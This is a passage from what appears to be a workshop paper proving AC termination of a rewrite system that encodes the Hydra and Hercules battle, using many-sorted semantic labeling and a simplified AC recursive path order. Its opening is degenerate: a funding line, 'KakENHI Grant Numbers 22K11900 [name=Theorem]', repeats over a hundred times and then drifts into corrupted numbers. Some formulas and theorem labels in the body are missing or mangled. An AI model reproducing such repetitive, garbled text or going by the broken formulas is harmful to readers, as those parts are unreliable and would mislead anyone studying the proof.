Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 22K11900 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K11900 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K11900 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K11900 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K11900 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K11900 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K11900 [name=Theorem]KakENHI Grant Numbers 2K11900 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K119000 [name=Theorem]KakENHI Grant Numbers 2K11900 [ C and rules 4 and 5. The end of the copying phase is signaled with E, which travels upwards with rules 6 and 7. Finally, rule 14 creates the next stage of the Battle. Note that we make extensive use of AC matching to simplify the search process. If \(H\) and \(H^{\prime}\) are the encodings in \(\mathcal{T}(\{\mathsf{h},\mathsf{i},\left|\right.\})\) of successive Hydras in an arbitrary battle then \(\mathsf{A}(n,H)\rightarrow^{+}_{\mathcal{H}/\mathsf{AC}}\mathsf{A}(\mathsf{s}( n),H^{\prime})\) for some \(n\in\mathcal{T}(\{\mathsf{0},\mathsf{s}\})\). Let \(H,H^{\prime}\in\mathcal{T}(\{\mathsf{h},\mathsf{i},\left|\right.\})\) be encodings of Hydras and let \(n\in\mathcal{T}(\{\mathsf{0},\mathsf{s}\})\) be the encoding of a natural number. If \(\mathsf{A}(n,H)\rightarrow^{*}_{\mathcal{H}/\mathsf{AC}}\mathsf{A}(\mathsf{s} (n),H^{\prime})\) then \(H\) and \(H^{\prime}\) are successive Hydras in a battle. The remaining part of this note is devoted to proving the termination of \(\mathcal{H}/\mathsf{AC}\). We exploit the fact that the TRS \(\mathcal{H}\) can be seen as a TRS over the many-sorted signature \[\mathsf{h}:\mathsf{O} \mathsf{i},\mathsf{E}:\mathsf{O}\rightarrow\mathsf{O} \mathsf{|:O\times O\rightarrow\mathsf{O}} \mathsf{A},\mathsf{B}:\mathsf{N}\times\mathsf{O}\rightarrow\mathsf{S}\] \[\mathsf{O}:\mathsf{N} \mathsf{s}:\mathsf{N}\rightarrow\mathsf{N} \mathsf{C},\mathsf{D}:\mathsf{N}\times\mathsf{O}\rightarrow\mathsf{O}\] where \(\mathsf{N}\), \(\mathsf{O}\) and \(\mathsf{S}\) are sort symbols. The type introduction technique [3, Corollary 3.9] guarantees that AC termination of \(\mathcal{H}\) follows from AC termination on well-sorted terms. A non-collapsing TRS over a many-sorted signature is AC terminating if and only if the corresponding TRS over the unsorted version of the signature is AC terminating. ## 2 Many-Sorted Semantic Labeling modulo AC The mutual dependence between the function symbols \(\mathsf{A}\) and \(\mathsf{B}\) in rules 3 and 14 of \(\mathcal{H}\) makes proving termination of \(\mathcal{H}/\mathsf{AC}\) a non-trivial task. We use the technique of semantic labeling (Zantema [9]) to resolve the dependence by labeling both \(\mathsf{A}\) and \(\mathsf{B}\) by the ordinal value of the Hydra encoded in their second arguments. Semantic labeling for rewriting modulo has been investigated in [5]. We need, however, a version for many-sorted rewriting since the distinction between ordinals and natural numbers is essential for the effectiveness of semantic labeling for \(\mathcal{H}/\mathsf{AC}\). Before introducing semantic labeling, we recall some basic semantic definitions. An _algebra_\(\mathcal{A}\) for an \(\mathcal{S}\)-sorted signature \(\mathcal{F}\) is a pair \((\{S_{\mathcal{A}}\}_{S\in\mathcal{S}},\{f_{\mathcal{A}}\}_{f\in\mathcal{F}})\), where each \(S_{\mathcal{A}}\) is a non-empty set, called the _carrier of sort_\(S\), and each \(f_{\mathcal{A}}\) is a function of type \(f:(S_{1})_{\mathcal{A}}\times\cdots\times(S_{n})_{\mathcal{A}}\to S_{ \mathcal{A}}\), called the _interpretation function_ of \(f:S_{1}\times\cdots\times S_{n}\to S\). A mapping that associates each variable of sort \(S\) to an element in \(S_{\mathcal{A}}\) is called an _assignment_. We write \(\mathcal{A}^{\mathcal{V}}\) for the set of all assignments. Given an assignment \(\alpha\in\mathcal{A}^{\mathcal{V}}\), the _interpretation_ of a term \(t\) is inductively defined as follows: \([\alpha]_{\mathcal{A}}(t)=\alpha(t)\) if \(t\) is a variable, and \([\alpha]_{\mathcal{A}}(t)=f_{\mathcal{A}}([\alpha]_{\mathcal{A}}(t_{1}), \ldots,[\alpha]_{\mathcal{A}}(t_{n}))\) if \(t=f(t_{1},\ldots,t_{n})\). Let \(\mathcal{A}=(\{S_{\mathcal{A}}\}_{S\in\mathcal{S}},\{f_{\mathcal{A}}\}_{f\in \mathcal{F}})\) be an \(\mathcal{S}\)-sorted \(\mathcal{F}\)-algebra. We assume that each carrier set \(S_{\mathcal{A}}\) is equipped with a well-founded order \(>_{S}\) such that the interpretation functions are weakly monotone in all argument positions, and call \((\mathcal{A},\{>_{S}\}_{S\in\mathcal{S}})\) a weakly monotone many-sorted algebra. Given terms \(s\) and \(t\) of sort \(S\), we write \(s\geqslant_{\mathcal{A}}t\)\((s=_{\mathcal{A}}t)\) if \([\alpha]_{\mathcal{A}}(s)\geqslant_{S}[\alpha]_{\mathcal{A}}(t)\)\(([\alpha]_{\mathcal{A}}(s)=_{S}[\alpha]_{\mathcal{A}}(t))\) holds for all \(\alpha\in\mathcal{A}^{\mathcal{V}}\). A labeling \(L\) for \(\mathcal{F}\) consists of sets of labels \(L_{f}\subseteq S_{\mathcal{A}}\) for every \(f:S_{1}\times\cdots\times S_{n}\to S\). The labeled signature \(\mathcal{F}_{\mathsf{lab}}\) consists of function symbols \(f_{a}:S_{1}\times\cdots\times S_{n}\to S\) for every function symbol \(f:S_{1}\times\cdots\times S_{n}\to S\) in \(\mathcal{F}\) and label \(a\in L_{f}\) together with all function symbols \(f\in\mathcal{F}\) such that \(L_{f}=\varnothing\). A _labeling_\((L,\mathsf{lab})\) for \((\mathcal{A},\{>_{S}\}_{S\in\mathcal{S}})\) consists of a labeling \(L\) for the signature \(\mathcal{F}\) together with a mapping \(\mathsf{lab}_{f}\colon(S_{1})_{A}\times\cdots\times(S_{n})_{A}\to L_{f}\) for every function symbol \(f:S_{1}\times\cdots\times S_{n}\to S\) in \(\mathcal{F}\) with \(L_{f}\neq\varnothing\). We call \((L,\mathsf{lab})\)_weakly monotone_ if all its labeling functions \(\mathsf{lab}_{f}\) are weakly monotone in all coordinates. The mapping determines the label of the root symbol \(f\) of a term \(f(t_{1},\ldots,t_{n})\), based on the values of its arguments \(t_{1},\ldots,t_{n}\). Formally, for every assignment \(\alpha\in\mathcal{A}^{\mathcal{V}}\) we define a mapping \(\mathsf{lab}_{\alpha}\) inductively as follows: \[\mathsf{lab}_{\alpha}(t)=\begin{cases}t&\text{if $t\in\mathcal{V}$}\\ f(\mathsf{lab}_{\alpha}(t_{1}),\ldots,\mathsf{lab}_{\alpha}(t_{n}))&\text{if $t=f(t_{1}, \ldots,t_{n})$ and $L_{f}=\varnothing$}\\ f_{\alpha}(\mathsf{lab}_{\alpha}(t_{1}),\ldots,\mathsf{lab}_{\alpha}(t_{n}))& \text{if $t=f(t_{1},\ldots,t_{n})$ and $L_{f}\neq\varnothing$}\end{cases}\] where \(a\) denotes the label \(\mathsf{lab}_{f}([\alpha]_{\mathcal{A}}(t_{1}),\ldots,[\alpha]_{\mathcal{A}}( t_{n}))\). Note that \(\mathsf{lab}_{\alpha}(t)\) and \(t\) have the same sort. Given a TRS \(\mathcal{R}\) over a (many-sorted) signature \(\mathcal{F}\), we define the _labeled_ TRS \(\mathcal{R}_{\mathsf{lab}}\) over the signature \(\mathcal{F}_{\mathsf{lab}}\) as follows: \[\mathcal{R}_{\mathsf{lab}}=\{\mathsf{lab}_{\alpha}(\ell)\to\mathsf{lab}_{ \alpha}(r)\mid\ell\to r\in\mathcal{R}\text{ and }\alpha\in A^{V}\}\] Since the AC symbol \(|\) in the encoding of the Hydra battle is a constructor, there is no need to label it. Hence we assume for simplicity that \(L_{f}=\varnothing\) for every AC symbol \(f\in\mathcal{F}\). The TRS \(\mathcal{D}\mathsf{ec}\) consists of all rewrite rules \[f_{a}(x_{1},\ldots,x_{n})\to f_{b}(x_{1},\ldots,x_{n})\] with \(f:S_{1}\times\cdots\times S_{n}\to S\) a function symbol in \(\mathcal{F}\), \(a,b\in L_{f}\) such that \(a>_{S}b\), and pairwise different variables \(x_{1},\ldots,x_{n}\). A weakly monotone algebra \((\mathcal{A},>)\) is a _quasi-model_ of \(\mathcal{R}/\mathsf{AC}\) if \(\ell\geqslant_{\mathcal{A}}r\) for all rewrite rules \(\ell\to r\) in \(\mathcal{R}\) and \(\ell=_{\mathcal{A}}r\) for all equations \(\ell\approx r\) in \(\mathsf{AC}\). Let \(\mathcal{R}/\mathsf{AC}\) be a TRS over a many-sorted signature \(\mathcal{F}\), \((\mathcal{A},\{>_{S}\}_{S\in\mathcal{S}})\) a quasi-model of \(\mathcal{R}/\mathsf{AC}\) with a weakly monotone labeling \((L,\mathsf{lab})\). If \((\mathcal{R}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec})/\mathsf{AC}\) is terminating then \(\mathcal{R}/\mathsf{AC}\) is terminating. After these preliminaries, we are ready to put many-sorted semantic labeling to the test. Consider the many-sorted algebra \(\mathcal{A}\) with carriers \(\mathbb{N}\) for sort \(\mathsf{N}\) and \(\mathbb{O}\), the set of ordinal numbers smaller than \(\epsilon_{0}\), for sorts \(\mathsf{O}\) and \(\mathsf{S}\) and the following interpretation functions: \[\mathsf{0}_{\mathcal{A}}=1\] \[\mathsf{h}_{\mathcal{A}}=1\] Here \(\oplus\) denotes natural addition on ordinals, which is strictly monotone in both arguments. The algebra \((\mathcal{A},\{>_{\mathsf{O}},>_{\mathsf{N}}\})\) is a quasi-model of \(\mathcal{H}/\mathsf{AC}\). We now label \(\mathsf{A}\) and \(\mathsf{B}\) by the value of their second argument. Let \(L_{\mathsf{A}}=L_{\mathsf{B}}=\mathbb{O}\) and \(L_{f}=\varnothing\) for the other function symbols \(f\), and define \(\mathsf{lab}\) as follows: \[\mathsf{lab}_{\mathsf{A}}(n,x)=\mathsf{lab}_{\mathsf{B}}(n,x)=x\] The labeling \((L,\mathsf{lab})\) results in the infinite rewrite system \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) with \(\mathcal{H}_{\mathsf{lab}}\) consisting of the rewrite rules \[\mathsf{A}_{\omega}(n,\mathrm{i}(\mathsf{h})) \stackrel{{ 1}}{{\longrightarrow}} \mathsf{A}_{1}(\mathsf{s}(n),\mathsf{h}) \mathsf{D}(n,\mathrm{i}(\mathrm{i}(x))) \stackrel{{ 8}}{{\longrightarrow}} \mathrm{i}(\mathsf{D}(n,\mathrm{i}(x)))\] \[\mathsf{A}_{\omega^{\mathrm{s}+1}}(n,\mathrm{i}(\mathsf{h}\mid x )) \stackrel{{ 2}}{{\longrightarrow}} \mathsf{A}_{\omega^{\mathrm{s}}}(\mathsf{s}(\mathsf{s}),\mathrm{i}(x)) \mathsf{D}(n,\mathrm{i}(\mathrm{i}(x)\mid y)) \stackrel{{ 9}}{{\longrightarrow}} \mathrm{i}(\mathsf{D}(n,\mathrm{i}(x))\mid y)\] \[\mathsf{A}_{\omega^{\mathrm{s}}}(n,\mathrm{i}(x)) \stackrel{{ 3}}{{\longrightarrow}} \mathsf{B}_{\omega^{\mathrm{s}}}(n,\mathsf{D}(\mathsf{s}(n), \mathrm{i}(x))) \mathsf{D}(n,\mathrm{i}(\mathrm{i}(\mathsf{h}\mid x)\mid y)) \stackrel{{ 10}}{{\longrightarrow}} \mathrm{i}(\mathsf{C}(n,\mathrm{i}(x))\mid y)\] \[\mathsf{C}(0,x) \stackrel{{ 4}}{{\longrightarrow}} \mathsf{E}(x) \mathsf{D}(n,\mathrm{i}(\mathrm{i}(\mathsf{h}\mid x)) \stackrel{{ 11}}{{\longrightarrow}} \mathrm{i}(\mathsf{C}(n,\mathrm{i}(x)))\] \[\mathsf{C}(\mathsf{s}(n),x) \stackrel{{ 5}}{{\longrightarrow}} x\mid\mathsf{C}(n,x) \mathsf{D}(n,\mathrm{i}(\mathrm{i}(\mathsf{h})\mid y)) \stackrel{{ 12}}{{\longrightarrow}} \mathrm{i}(\mathsf{C}(n,\mathrm{h})\mid y)\] \[\mathrm{i}(\mathsf{E}(x)\mid y) \stackrel{{ 6}}{{\longrightarrow}} \mathsf{E}(\mathrm{i}(x\mid y)) \mathsf{D}(n,\mathrm{i}(\mathrm{i}(\mathsf{h}))) \stackrel{{ 13}}{{\longrightarrow}} \mathrm{i}(\mathsf{C}(n,\mathrm{h}))\] \[\mathrm{i}(\mathsf{E}(x)) \stackrel{{ 7}}{{\longrightarrow}} \mathsf{E}(\mathrm{i}(x)) \mathsf{B}_{v+1}(n,\mathsf{E}(x)) \stackrel{{ 14}}{{\longrightarrow}} \mathsf{A}_{v}(\mathsf{s}(n),x)\] for all \(v\in\mathbb{O}\) and \(\mathcal{D}\mathsf{ec}\) consisting of the rewrite rules \[\mathsf{A}_{v}(n,x) \,\to\,\mathsf{A}_{w}(n,x) \mathsf{B}_{v}(n,x) \,\to\,\mathsf{B}_{w}(n,x)\] for all \(v,w\in\mathbb{O}\) with \(v>w\). According to Theorem 3.1, the AC termination of \(\mathcal{H}\) on many-sorted terms follows from the AC termination of \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\). If \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) is \(\mathrm{AC}\) terminating then \(\mathcal{H}\) is \(\mathrm{AC}\) terminating on sorted terms. ## 3 Ac-Mpo In order to show AC termination of \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) we use a simplified version of AC-RPO. Let \(\mathcal{F}_{\mathsf{AC}}\) be the set of AC symbols in \(\mathcal{F}\). Given a non-variable term \(t=f(t_{1},\ldots,t_{n})\), the multiset \(\triangledown(t)\) of its arguments is defined inductively as follows: \[\triangledown(t) =\triangledown_{f}(t_{1})\uplus\dots\uplus\triangledown_{f}(t_{ n})\] \[\triangledown_{f}(t) =\begin{cases}\triangledown_{f}(t_{1})\uplus\triangledown_{f}(t _{2})&\text{if $t=f(t_{1},t_{2})$ and $f\in\mathcal{F}_{\mathsf{AC}}$}\\ \{t\}&\text{otherwise}\end{cases}\] For example, if \(+\) is an AC symbol, we have \(\triangledown_{+}(\mathsf{a}+(\mathsf{b}+x))=\{\mathsf{a},\mathsf{b},x\}\). If \(f\) is a non-AC symbol, we have \(\triangledown(f(t_{1},\ldots,t_{n}))=\{t_{1},\ldots,t_{n}\}\). Let \(>\) be a precedence. We define \(>_{\mathsf{acmpo}}\) inductively as follows: \(s>_{\mathsf{acmpo}}t\) if \(s\notin\mathcal{V}\) and one of the following conditions holds: 1. \(\triangledown(s)\geqslant_{\mathsf{acmpo}}^{\mathsf{mul}}\{t\}\), 2. \(\mathsf{root}(s)>\mathsf{root}(t)\) and \(\{s\}>_{\mathsf{acmpo}}^{\mathsf{mul}}\triangledown(t)\), 3. \(\mathsf{root}(s)=\mathsf{root}(t)\) and \(\triangledown(s)>_{\mathsf{acmpo}}^{\mathsf{mul}}\triangledown(t)\). Here \(\geqslant_{\mathsf{acmpo}}\) is the union of \(>_{\mathsf{acmpo}}\) and \(=_{\mathsf{AC}}\). Moreover, \(=_{\mathsf{AC}}\) is used instead of \(=\) in the definition of multiset extension. Note that if there are no AC symbols, the above definition reduces to the original recursive path order of Dershowitz [1], nowadays known as the _multiset path order_. Hence the simplified AC-RPO will be called AC-MPO. We assume that AC symbols are minimal in a given precedence. Without the assumption, the relation \(>_{\mathsf{acmpo}}\) is not closed under contexts. To see this, consider the example of [6, Section 3]: Let \(>\) be the precedence with \(+>\mathsf{c}\), where \(+\) is an AC symbol. The relation \(\mathsf{a}+\mathsf{a}>_{\mathsf{acmpo}}\mathsf{c}\) holds, but \(\mathsf{a}+(\mathsf{a}+\mathsf{a})>_{\mathsf{acmpo}}\mathsf{a}+\mathsf{c}\) does not. Note that due to the minimality requirement, different AC symbols are incomparable. In fact, if the AC symbols \(\times\) and \(+\) satisfy \(\times>+\) then \(x\times y>_{\mathsf{acmpo}}x+y\) but not \(z\times(x\times y)>_{\mathsf{acmpo}}z\times(x+y)\). If \(\mathrm{AC}\) symbols are minimal in the precedence \(>\) then \(>_{\mathsf{acmpo}}\) is an incremental \(\mathrm{AC}\)-compatible rewrite order with the subterm property. As a consequence, \(>_{\mathsf{acmpo}}\) is an AC-compatible reduction order when the underlying signature is finite. This also holds for infinite signatures, provided the precedence \(>\) is well-founded and there are only finitely many AC symbols. This extension is important because the signature of \(\mathcal{H}_{\mathsf{lab}}\) is infinite. Below, we will formally prove the correctness of the extension, by adopting the approach of [4]. A strict order \(>\) on a set \(A\) is a _partial well-order_ if for every infinite sequence \(a_{0},a_{1},\ldots\) of elements in \(A\) there exist indices \(i\) and \(j\) such that \(i<j\) and \(a_{i}\leqslant a_{j}\). Well-founded total orders (_well-orders_) are partial well-orders. Given a partial well-order \(>\) on \(\mathcal{F}\), the _embedding_ TRS \(\mathcal{E}\mathsf{mb}(\mathcal{F},>)\) consists of the rules \(f(x_{1},\ldots,x_{n})\to x_{i}\) for every \(n\)-ary function symbol and \(1\leqslant i\leqslant n\), together with the rules \(f(x_{1},\ldots,x_{n})\to g(x_{i_{1}},\ldots,x_{i_{m}})\) for all function symbols \(f\) and \(g\) with arities \(m\) and \(n\) such that \(f>g\), and indices \(1\leqslant i_{1}<i_{2}<\cdots<i_{m}\leqslant n\). Here \(x_{1},\ldots,x_{n}\) are pairwise distinct variables. [[4, Theorem 5.3]] A rewrite order \(>\) is well-founded if \(\mathcal{E}\mathsf{mb}(\mathcal{F},\sqsupset)\subseteq>\) for some partial well-order \(\sqsupset\). Consider a signature \(\mathcal{F}\) with only finitely many \(\mathrm{AC}\) symbols that are minimal in a given well-founded precedence \(>\). The relation \(>_{\mathsf{acmpo}}\) is an \(\mathrm{AC}\)-compatible reduction order. Proof.: We only need to show well-foundedness of \(>_{\mathsf{acmpo}}\) because the other properties follow by Theorem 3.2. Let \(\sqsupset\) be an arbitrary partial well-order that contains \(>\) and in which \(\mathrm{AC}\) symbols are minimal. The inclusion \(\mathcal{E}\mathsf{mb}(\mathcal{F},\sqsupset)\subseteq\sqsupset_{\mathsf{ acmpo}}\) is easily verified. Hence the well-foundedness of \(\sqsupset_{\mathsf{acmpo}}\) is obtained from Theorem 3.2. Since \(>\subseteq\sqsupset\), the incrementality of \(\mathrm{AC}\)-MPO yields \(>_{\mathsf{acmpo}}\subseteq\sqsupset_{\mathsf{acmpo}}\). It follows that \(>_{\mathsf{acmpo}}\) is well-founded. We show the termination of \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) by \(\mathrm{AC}\)-RPO. To this end, we consider the following precedence \(>\) on the labeled signature: \[\mathsf{A}_{v} >\mathsf{A}_{w} \text{for all }v,w\in\mathbb{O}\text{ with }v>w\] \[\mathsf{B}_{v} >\mathsf{B}_{w} \text{for all }v,w\in\mathbb{O}\text{ with }v>w\] \[\mathsf{B}_{v+1} >\mathsf{A}_{v} >\mathsf{B}_{v} \text{for all }v\in\mathbb{O}\] \[\mathsf{B}_{0} >\mathsf{s}>\mathsf{D}>\mathsf{C}>\mathsf{i}>\mathsf{E}>|\] Note that \(>\) is well-founded and the only \(\mathrm{AC}\) symbol \(|\) is minimal. In order to ease the compatibility verification we employ the following simple criterion. Let \(\ell\to r\) be a rewrite rule and let \(>\) be a precedence. If \(\mathsf{root}(\ell)>g\) for all function symbols \(g\) in \(r\) then \(\ell>_{\mathsf{acmpo}}r\). \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\,\subseteq\,>_{\mathsf{ acmpo}}\) Proof.: Lemma 3.2 applies to all rules of \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\), except \(5\,-\,9\). We consider rule \(6\) here; the other rewrite rules are handled in a similar fashion. Since case (1) of Definition 9 yields \(\mathsf{E}(x)>_{\mathsf{acmpo}}x\), we have \(\triangledown(\mathsf{E}(x)\,|\,y)=\{\mathsf{E}(x),y\}>_{\mathsf{acmpo}}^{ \text{mul}}\{x,y\}=\triangledown(x\,|\,y)\). Thus \(\mathsf{E}(x)\,|\,y>_{\mathsf{acmpo}}x\,|\,y\) follows by case (3). Using case (3) again, we obtain \(\mathsf{i}(\mathsf{E}(x)\,|\,y)>_{\mathsf{acmpo}}\mathsf{i}(x\,|\,y)\). Because of \(\mathsf{i}>\mathsf{E}\), the desired orientation \(\mathsf{i}(\mathsf{E}(x)\,|\,y)>_{\mathsf{acmpo}}\mathsf{i}(x\,|\,y)\) is concluded by case (2). The TRS \(\mathcal{H}_{\mathsf{lab}}\cup\mathcal{D}\mathsf{ec}\) is \(\mathrm{AC}\) terminating. Hence, the TRS \(\mathcal{H}/\mathsf{AC}\) is terminating. ## 4 Concluding Remarks We presented a termination proof of the recent encoding of the Battle of Hydra and Hercules as a TRS with \(\mathrm{AC}\) symbols. Compared to [2], the new ingredient in this paper is a much weakened version of \(\mathrm{AC}\)-RPO. This might ease future formalization efforts. In the previous edition of WST we presented a termination proof of the TRS \(\mathcal{H}\) using a new \(\mathrm{AC}\) termination criterion based on weakly monotone algebras, which we recall here. **Theorem 16**.: _A TRS\(\mathcal{R}\) over a finite many-sorted signature \(\mathcal{F}\) is \(\mathrm{AC}\) terminating if there exists a totally ordered simple monotone \(\mathcal{F}\)-algebra \((\mathcal{A},>)\) such that \(\mathcal{R}\subseteq>_{\mathcal{A}}\), \(\mathsf{AC}\subseteq=_{\mathcal{A}}\), and \(f_{\mathcal{A}}\) is strictly monotone for all \(\mathrm{AC}\) symbols \(f\)._ Here an \(\mathcal{S}\)-sorted \(\mathcal{F}\)-algebra \(\mathcal{A}=(\{S_{\mathcal{A}}\}_{S\in\mathcal{S}},\{f_{\mathcal{A}}\}_{f\in \mathcal{F}})\) equipped with a strict order \(>\) on the union of all carriers \(S_{\mathcal{A}}\) is _simple monotone_ if every carrier \(S_{\mathcal{A}}\) is non-empty, \((S_{i})_{\mathcal{A}}\subseteq S_{\mathcal{A}}\) for all \(f:S_{1}\times\cdots\times S_{n}\to S\) in \(\mathcal{F}\) and \(1\leqslant i\leqslant n\), and every interpretation function \(f_{\mathcal{A}}\) is weakly monotone and simple. The latter amounts to the requirement \(f_{\mathcal{A}}(a_{1},\ldots,a_{i},\ldots,a_{n})\geqslant a_{i}\) for all \(1\leqslant i\leqslant n\) and \((a_{1},\ldots,a_{n})\in(S_{1})_{\mathcal{A}}\times\cdots\times(S_{n})_{ \mathcal{A}}\). When applying Theorem 16 to the _many-sorted_ TRS\(\mathcal{H}\) we used the following interpretation for the symbol \(\mathsf{D}\): \[\mathsf{D}_{\mathcal{A}}((n_{1},n_{2},n_{3}),(x_{1},x_{2},x_{3}))=(n_{1}+x_{1},n_{2}+x_{2},n_{2}+n_{3}+x_{2}+x_{3})\] with \((n_{1},n_{2},n_{3})\in(\mathbb{N}\setminus\{0,1\})\times\mathbb{N}\times \mathbb{N}\) and \((x_{1},x_{2},x_{3})\in(\mathbb{O}\setminus\{0,1\})\times\mathbb{N}\times \mathbb{N}\). This is however not weakly monotone as \((1,0,0)>(0,0,1)\) but 